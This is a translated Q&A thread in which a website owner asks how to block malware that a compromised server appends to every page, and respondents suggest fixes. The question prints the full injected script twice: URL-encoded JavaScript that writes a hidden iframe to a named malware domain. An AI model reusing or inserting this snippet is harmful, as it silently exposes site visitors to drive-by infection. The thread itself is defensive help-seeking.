Программная остановка определенного фрагмента кода в html / javascript / css

Question

На сервере, где находится мой веб-сайт, также есть вирус.

Вирус внедряет вредоносный код

<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>

на КАЖДУЮ отдельную страницу, которая обслуживается, и она предварительно обрабатывается Apache или чем-то подобным, чтобы добавить его в конец файла.

Я создал тестовый файл со следующим кодом:

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
</body>
</html>

Это не красиво, но оно послужило своей цели.

При просмотре страницы в моем браузере я получаю

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script> 
</body> 
</html>

, который можно просмотреть по адресу www.sagamountain.com/testfile.html (предупреждение, эта страница заражена)

Мне нужно программно остановить выполнение этого div и этого скрипта, так как это iframe для сайта с трояном. HTML, CSS или JS, мне просто нужен какой-то способ предотвратить запуск этого JS.

Он уже отображается: нет, поэтому вы его не видите, но как я могу вообще предотвратить загрузку iframe?

Спасибо за помощь! Непонятная вещь превращается в iframe в http://ncccnnnc.cn/img/index.php, который явно является источником моих неприятностей. Не заходите на этот сайт!

РЕДАКТИРОВАТЬ: Это продолжение https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459

Answer 1

Извините, что не могу ответить на ваш конкретный вопрос, но я думаю, что вы смотрите на это неправильно. Что вам нужно , чтобы сделать , а не , чтобы удалить HTML-код, вставленный вирусом, то, что вам нужно , , - это поговорить с веб-хостом / системным администратором и удалить его. вирус .

Лечение симптомов не излечит инфекцию. Лечение болезни , однако, также вылечит симптомы и удалит вирус.

Answer 2

Кибер, если вам нужно подождать, пока кто-нибудь исправит сервер, я бы сказал, что вам следует попробовать завершить свои документы открытым тегом <noscript> или открытым тегом комментария HTML.

Вы не можете использовать Javascript, чтобы остановить контент, который не был обработан, если вы не используете document.write и один из приведенных выше тегов (noscript / comment). Также вы ничего не можете сделать, разместив скрипт после, так как уже слишком поздно (контент уже есть).

Это уродливое решение, но оно должно помешать посетителям вашего сайта столкнуться с вирусом. Это также делает вашу разметку недействительной, но любой браузер должен иметь возможность ее анализировать и отображать так, как вы ожидаете.

Удачи с сервером!

Answer 3

Файл на вашем сервере - это php-файл, смотрите в комментариях здесь .